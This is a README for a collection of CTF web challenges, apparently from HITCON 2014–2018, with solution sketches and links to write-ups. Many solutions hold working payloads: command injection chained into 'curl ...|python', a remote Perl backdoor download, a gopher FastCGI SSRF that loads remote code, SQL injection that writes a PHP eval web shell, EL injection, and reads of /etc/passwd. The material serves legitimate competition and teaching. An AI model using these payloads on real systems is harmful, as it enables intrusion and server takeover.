This is the repo of CTF challenges I made, including the source code, write-up and idea explanation! Hope you like it :)
P.S. BTW, the Babyfirst series are my favorite of all the challenges. If you don't have time to see them all, please look at those at least!
You can contact me via:
Table of Contents
One Line PHP Challenge
Difficulty: ★★★★
Solved: 3 / 1816
Tag: PHP
Source Code
Solution
P.S. This is a default installation of PHP 7.2 + Apache on Ubuntu 18.04.
- Control partial session file content by `PHP_SESSION_UPLOAD_PROGRESS`
- Bypass `session.upload_progress.cleanup = On` by race condition or slow query
- Control the prefix to `@<?php` by chaining PHP wrappers
Write Ups
- (English) One Line PHP Challenge
- (Chinese) One Line PHP Challenge
- hitcon2018 One Line PHP Challenge
- hitcon 2018 suffering notes (1): one-line-php-challenge study
Baby Cake
Difficulty: ★★★
Solved: 4 / 1816
Tag: Code Review, PHP, De-serialization
Source Code
Solution
Due to the implementation of `CURLOPT_SAFE_UPLOAD` in CakePHP's `FormData.php`, we can read arbitrary files!
```
# arbitrary file read, listen port 12345 on your server
http://13.230.134.135/
    ?url=http://your_ip:12345/
    &data[x]=@/etc/passwd

# arbitrary de-serialization: the Monolog POP chain
http://13.230.134.135/
    ?url=http://your_ip:12345/
    &data[x]=@phar://../tmp/cache/mycache/[your_ip]/[md5_of_url]/body.cache
```
Write Ups
Oh My Raddit
Difficulty: ★★☆
Solved: 27 / 1816
Tag: Observation, DES checksum, Crypto, Web
Source Code
Solution
- Know `ECB` mode from block frequency analysis
- Know `block size = 8` from cipher length
- From the information above, it's reasonable to use `DES` in the real world
- The most common block is `3ca92540eb2d0a42` (always at the cipher end). We can guess it's the padding `\x08\x08\x08\x08\x08\x08\x08\x08`
- Due to the parity checking in DES, we can reduce the keyspace from 26 (`abcdefghijklmnopqrstuvwxyz`) to 13 (`acegikmoqsuwy`)
- Break in 1 second with HashCat
- Break in 10 minutes with single-thread Python
- Break in 1 second with
Write Ups
Oh My Raddit v2
Difficulty: ★★
Solved: 10 / 1816
Tag: Web.py, SQL Injection to RCE
Source Code
Solution
- Read the package version from `requirements.txt`
Write Ups
Why so Serials?
Difficulty: ★★★★
Solved: 1 / 1816
Tag: De-serialization, RCE, ASP.NET, View State
Source Code
Solution
- Get the `machineKey` in `web.config` by Server-Side Includes (`.shtml` or `.stm`)
- Exploit ASP.NET `__VIEWSTATE` by ysoserial.net
Write Ups
BabyFirst Revenge
Difficulty: ★☆
Solved: 95 / 1541
Tag: WhiteBox, PHP, Command Injection
Idea
- Command Injection, but only in 5 bytes
Source Code
Solution
```
# generate `ls -t>g` to file "_"
http://host/?cmd=>ls\
http://host/?cmd=ls>_
http://host/?cmd=>\ \
http://host/?cmd=>-t\
http://host/?cmd=>\>g
http://host/?cmd=ls>>_

# generate `curl orange.tw|python` to file "g"
http://host/?cmd=>on
http://host/?cmd=>th\
http://host/?cmd=>py\
http://host/?cmd=>\|\
http://host/?cmd=>tw\
http://host/?cmd=>e.\
http://host/?cmd=>ng\
http://host/?cmd=>ra\
http://host/?cmd=>o\
http://host/?cmd=>\ \
http://host/?cmd=>rl\
http://host/?cmd=>cu\
http://host/?cmd=sh _

# got shell
http://host/?cmd=sh g
```
You can check exploit.py for the details! There are also lots of creative solutions; you can check the write ups below.
Write Ups
- HITCON CTF 2017-BabyFirst Revenge-writeup
- HITCON CTF 2017-BabyFirst Revenge-writeup (Via curl)
- HITCON 2017 CTF BabyFirst Revenge
- HITCON CTF 2017 - BabyFirst Revenge (172 pts.)
- Hitcon CTF 2017 - Baby Revenge
- Hitcon CTF 2017 Quals: Baby First Revenge (web 172) (Via xxd)
- HITCON CTF 2017 BabyFirst Revenge & v2 writeup
- BabyFirst-Revenge-HITCOIN-2017-QUALS by @n4p5ter
BabyFirst Revenge v2
Difficulty: ★★★★
Solved: 8 / 1541
Tag: WhiteBox, PHP, Command Injection
Idea
- Command Injection, but only in 4 bytes
Source Code
Solution
- generate `g> ht- sl` to file `v`
- reverse file `v` to file `x`
- generate `curl orange.tw|python;`
- execute `x`, `ls -th >g`
- execute `g`
You can check exploit.py for the details!
Write Ups
- Baby First Revenge v2 (Via vim) by @bennofs
- [python] baby-exp.py
- How to solve a CTF challenge for $20 - HITCON 2017 BabyFirst Revenge v2
- HITCON CTF 2017 BabyFirst Revenge & v2 writeup
SSRFme?
Difficulty: ★★☆
Solved: 20 / 1541
Tag: WhiteBox, Perl, PATH Pollution
Idea
- CVE-2016-1238 (but the latest version of Ubuntu 17.04 in AWS is still vulnerable)
- Perl looks up the current directory when importing modules
- Perl module URI/lib/URI.pm#L136 will `eval` if there is an unknown scheme
Source Code
```sh
$ sudo apt install libwww-perl
```
Solution
```sh
# write evil URI module to current directory
$ curl http://host/?filename=URI/orange.pm&url=http://orange.tw/w/backdoor.pl

# eval evil module `orange`
$ curl http://host/?filename=xxx&url=orange://orange.tw
```
Write Ups
SQL so Hard
Difficulty: ★★★
Solved: 10 / 1541
Tag: WhiteBox, MySQL, PostgreSQL, SQL Injection, Code Injection
Idea
- MySQL `max_allowed_packet` dropped the large-size SQL statement
- Node-Postgres code execution vulnerability
- Exploit the RCE in SQL `UPDATE` syntax
Source Code
Solution
Write Ups
Baby^H Master PHP 2017
Difficulty: ★★★★☆
Solved: 0 / 1541
Tag: WhiteBox, PHP, Serialization, Apache Prefork
Idea
- PHP does the de-serialization on `PHAR` parsing
- PHP assigns a predictable function name `\x00lambda_%d` to an anonymous function
- Break shared VARIABLE state in Apache Pre-fork mode
Source Code
Solution
```sh
# get a cookie
$ curl http://host/ --cookie-jar cookie

# download .phar file from http://orange.tw/avatar.gif
$ curl -b cookie 'http://host/?m=upload&url=http://orange.tw/'

# force apache to fork new process
$ python fork.py &

# get flag
$ curl -b cookie "http://host/?m=upload&url=phar:///var/www/data/$MD5_IP/&lucky=%00lambda_1"
```
Write Ups
papapa
Difficulty: ★
Solved: 71 / 1024
Tag: BlackBox, SSL, Pentesting
Idea
- Leak the internal hostname from SSL certificate
Source Code
Solution
```sh
$ openssl s_client -showcerts -connect 1.2.3.4:443 < /dev/null | openssl x509 -text | grep -A 1 "Subject Alternative Name"
...
depth=0 C = TW, ST = Some-State, O = Internet Widgits Pty Ltd, CN = very-secret-area-for-ctf.orange.tw, emailAddress = [email protected]
...

# get flag
$ curl -k -H "host: very-secret-area-for-ctf.orange.tw" https://1.2.3.4/
```
Write Ups
- HITCON 2016
- HITCON CTF 2016: %%% (Web) Write-up
- [HITCON 2016] [WEB 100 - %%%] WRITE UP
- hitcon2016 web writeup
Leaking
Difficulty: ★★
Solved: 43 / 1024
Tag: WhiteBox, JavaScript, NodeJS
Idea
- Break JavaScript Sandbox
- Use NodeJS `Buffer(int)` to steal uninitialized memory
- Node.js Buffer knows everything
Source Code
Solution
```sh
$ while true; do curl 'http://1.2.3.4/?data=Buffer(1e4)' | grep -a hitcon; done;
```
Write Ups
BabyTrick
Difficulty: ★★★
Solved: 24 / 1024
Tag: WhiteBox, PHP, MySQL, SQL Injection, Unserialize
Idea
- Create an Unexpected Object and Don't Invoke __wakeup() in Deserialization
- SugarCRM v6.5.23 PHP deserialization object injection vulnerability
- MySQL UTF-8 collation: `SELECT 'Ä'='a'` is True
Source Code
Solution
```sh
# get password
curl http://1.2.3.4/
    ?data=O:6:"HITCON":3:{s:14:"%00HITCON%00method";s:4:"show";s:12:"%00HITCON%00args";a:1:{i:0;s:39:"'union%20select%201,2,password%20from%20users%23";}}

# get flag
curl http://1.2.3.4/
    ?data=O:6:"HITCON":2:{s:14:"%00HITCON%00method";s:5:"login";s:12:"%00HITCON%00args";a:2:{i:0;s:7:"orÄnge";i:1;s:13:"babytrick1234";}}
```
Write Ups
Angry Boy
Difficulty: ★★☆
Solved: 43 / 1024
Tag: GrayBox, Java
Idea
- `new String(new byte[] {1, -1, 1, -1})` will output `01EFBFBD01EFBFBD`, not `01FF01FF`
- When ‘EFBFBD’ And Friends Come Knocking: Observations Of Byte Array To String Conversions
Source Code
Solution
Write Ups
Angry Seam
Difficulty: ★★★★
Solved: 4 / 1024
Tag: GrayBox, Java, Seam Framework, CSS RPO, EL Injection, Java Deserialization
Idea
- CSS Relative Path Overwrite
- Built-in redirection parameter
actionOutcome
- RPO Gadgets
- CVE-2010-1871: JBoss Seam Framework remote code execution
Source Code
Solution
P.S. I made this challenge because once, when I tried to review the code of the Seam Framework, I found some 0-days and I thought it must have more. So I threw out a brick to attract a jade. And the result was more than I expected :P
Intended solution
- Register an account: username `AAAAAA`, password `AAAAAA`, realname `{/*';*/}%0a@import'http://orange.tw/?`
- Report URL `http://1.2.3.4:8080/angryseam/profile.seam?actionOutcom>e=/profile.seam?username%3dAAAAAA`
Unintended solution
- Register an account
- Update description to `/?x=#{expressions.instance().createValueExpression(request.getHeader('cmd')).getValue()}`
- Login and access

```http
GET /angryseam/template.seam?actionMethod=template.xhtml:util.escape(sessionScope['user'].getDescription()) HTTP/1.1
host: 1.2.3.4
cmd: #{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[15].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null),request.getHeader('ccc'))}
ccc: ls -alh
...
```
Unintended solution
- CVE-2013-2165 Java deserialization vulnerability
Unintended solution
- SESSION manipulation... seam SUCKS
Write Ups
Babyfirst
Solved: 33 / 969
Difficulty: ★★
Tag: WhiteBox, PHP, Command Injection
Idea
- Use `NewLine` to bypass the regular expression check
- Command injection only with alphanumeric characters
Source Code
```php
<?php
highlight_file(__FILE__);

$dir = 'sandbox/' . $_SERVER['REMOTE_ADDR'];
if ( !file_exists($dir) )
    mkdir($dir);
chdir($dir);

$args = $_GET['args'];
for ( $i=0; $i<count($args); $i++ ){
    if ( !preg_match('/^\w+$/', $args[$i]) )
        exit();
}

exec("/bin/orange " . implode(" ", $args));
?>
```
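As an added illustration (not code from this repo), the Babyfirst check transliterated into Python: Python's `re` and PCRE both let `$` match just before a trailing newline, so a `%0a`-terminated argument passes `/^\w+$/` and then splits the joined command line, while the strict anchor (`\Z` in Python, `\z` or the `D` modifier in PCRE) rejects it. The `/bin/orange` prefix and the argument shape are taken from the challenge source; the sample arguments are constructed.

```python
import re

# Challenge's check, transliterated from PHP preg_match('/^\w+$/', ...).
# In both PCRE and Python's re, '$' also matches just before a trailing
# newline, so "x\n" is accepted although it is not purely alphanumeric.
LOOSE = re.compile(r'^\w+$')

# Hardened check: \Z (Python) / \z or the D modifier (PCRE) anchors at the
# true end of the string, so a trailing newline is rejected.
STRICT = re.compile(r'^\w+\Z')


def loose_ok(arg: str) -> bool:
    return LOOSE.match(arg) is not None


def strict_ok(arg: str) -> bool:
    return STRICT.match(arg) is not None


def build_command(args, check):
    """Mimic the challenge: validate every arg with `check`, then join them
    into the single /bin/orange command line. Returns None when any arg
    fails the check (the PHP calls exit() instead)."""
    if not all(check(a) for a in args):
        return None
    return "/bin/orange " + " ".join(args)


def shell_lines(cmd: str):
    """Split the joined command the way the shell would: each embedded
    newline ends one command and starts the next."""
    return [line.strip() for line in cmd.split("\n") if line.strip()]


# Constructed sample in the shape of the challenge URL (args[0]=x%0a ...):
# every '%0a' becomes a newline inside an otherwise \w-only argument.
SAMPLE_ARGS = ["x\n", "mkdir", "orange\n"]

if __name__ == "__main__":
    cmd = build_command(SAMPLE_ARGS, loose_ok)
    print(shell_lines(cmd))                       # two separate commands
    print(build_command(SAMPLE_ARGS, strict_ok))  # None: hardened check rejects it
```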
Solution
```
http://localhost/
    ?args[0]=x%0a
    &args[1]=mkdir
    &args[2]=orange%0a
    &args[3]=cd
    &args[4]=orange%0a
    &args[5]=wget
    &args[6]=846465263%0a

http://localhost/
    ?args[0]=x%0a
    &args[1]=tar
    &args[2]=cvf
    &args[3]=aa
    &args[4]=orange%0a
    &args[5]=php
    &args[6]=aa
```
There are also lots of creative solutions; you can check the write ups below.
Write Ups
- babyfirst (web 100)
- HITCON CTF 2015 Web 100 Web 300 Writeup
- HITCON 2015 Quals: Babyexploit
- Babyfirst (web, 100p, ?? solves)
nanana
Difficulty: ★★★
Solved: 18 / 969
Tag: GrayBox, C, PWN
Idea
- Pwn without library
- Format String without output
- Bypass Stack Guard by overflowing `ARGV[1]`
Source Code
Solution
Write Ups
- nanana (pwn, web 200)
- HITCON 2015 Quals: Nanana
- Pwning (sometimes) with style - Dragons’ notes on CTFs
Giraffe's Coffee
Difficulty: ★★★☆
Solved: 16 / 969
Tag: WhiteBox, PHP
Idea
- Break PHP PRNG
- Break shared PRNG STATE in Apache Prefork mode
Source Code
Solution
TBD
Write Ups
- HITCON CTF 2015 Web 100 Web 300 Writeup
- Giraffe's Coffee - Web 300 Problem - Writeup by Robert Xiao (@nneonneo)
- HITCON 2015 WEB 300
lalala
Difficulty: ★★★☆
Solved: 2 / 969
Tag: BlackBox, PHP, SSRF
Idea
- Bypass SSRF restriction with 302 redirect
- Exploit the FastCGI protocol by using gopher
Source Code
Solution
```php
<?php
header( "Location: gopher://127.0.0.1:9000/x%01%01Zh%00%08%00%00%00%01%00%00%00%00%00%00%01%04Zh%00%86%00%00%0E%03REQUEST_METHODGET%0F%0ASCRIPT_FILENAME/www/a.php%0F%16PHP_ADMIN_VALUEallow_url_include%20%3D%20On%09%26PHP_VALUEauto_prepend_file%20%3D%20http%3A//orange.tw/x%01%04Zh%00%00%00%00%01%05Zh%00%00%00%00" );
```
Write Ups
Use-After-FLEE
Solved: 1 / 969
Difficulty: ★★★★☆
Tag: WhiteBox, PHP, UAF, PWN
Idea
- Bypass open_basedir
- Bypass disable_functions
- PHP use-after-free exploit writing
- Bypass full protection (DEP / ASLR / PIE / FULL RELRO)
- Yet Another Use After Free Vulnerability in unserialize() with SplDoublyLinkedList
Source Code
Solution
TBD
Write Ups
PUSHIN CAT
Solved: 8 / 1020
Difficulty: ★★
Tag: BlackBox, PHP, H2, SQL Injection
Idea
- SQL Injection on H2 Database
- Execute Code by using H2 SQL Injection
Source Code
Solution
TBD
Write Ups
- HITCON CTF 2014: PUSHIN CAT
- HITCON CTF 2014 - PUSHIN CAT (H2 DB Insert SQL Injection)
- HITCON CTF 2014
PY4H4SHER
Solved: 30 / 1020
Difficulty: ★★☆
Tag: WhiteBox, Python, Collision, HPP
Idea
- Python CGI HTTP Pollution
- MySQL old_password hash collisions
- PBKDF2+HMAC hash collisions explained
Source Code
Solution
TBD
Write Ups
LEENODE
Solved: 2 / 1020
Difficulty: ★★★
Tag: BlackBox, ColdFusion, Apache
Idea
- Multilayered architecture vulnerability
- Double Encoding
Source Code
Solution
```sh
# get password
$ curl http://1.2.3.4/admin%252f%252ehtpasswd%2500.cfm

# get flag
$ curl http://1.2.3.4/admin/thefl4g.txt
```
Write Ups
BlackBox
Solved: 0 / 12
Difficulty: ★★★★
Tag: GrayBox, PHP, JAVA, mod_jk, H2, SQL Injection, WAF
Idea
- Multilayered architecture vulnerability
- Default and up-to-date mod_jk leads to directory traversal
- Bypass WAF by incorrect usage of BASE64 and URLENCODE
- SQL Injection on H2 Database
- Execute Code by using H2 SQL Injection
Source Code
Solution
- Get source code
  ```
  http://1.2.3.4/login/..;/
  ```
- Review code and find a way to bypass WAF
  ```sh
  $ curl "http://1.2.3.4/news/?id=1~~~~' and 1=2 union select null,null,version(),null--"
  $ curl "http://1.2.3.4/news/?id=1~~~~' and 1=2 union select null,null,file_read('/etc/apache2/sites-enabled/000-default.conf'),null--"
  ```
- Write shell
  ```sh
  $ curl "http://1.2.3.4/news/?id=1~~~~' and 1=2 union select null,null,file_write('3c3f706870206576616c28245f504f53545b6363635d293b3f3e', '/www/write_shell_here_=P/.a.php'),null--"
  $ curl "http://1.2.3.4/write_shell_here_=P/.a.php" -d 'phpinfo();'
  ```
Write Ups
TBD
SQLPWN
Solved: 0 / ??
Difficulty: ★★★
Tag: WhiteBox, PHP, SQL Injection, LFI, Race Condition
Idea
- One-byte off SQL Injection
- Race Condition
- Local file inclusion with PHP session
Source Code
Solution
- Run exploit.py to win the race condition
- Login and SQL Injection
  ```sh
  $ curl http://1.2.3.4/sqlpwn.php -d 'title=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\&note=, concat(0x3a3a3a3a3a3a,(select pass from users where name=0x6f72616e6765)))#'
  ```
- Local file inclusion with session
  ```sh
  $ curl http://1.2.3.4/sqlpwn.php?mode=admin&boom=../../../../../../var/lib/php5/sess_243220
  ```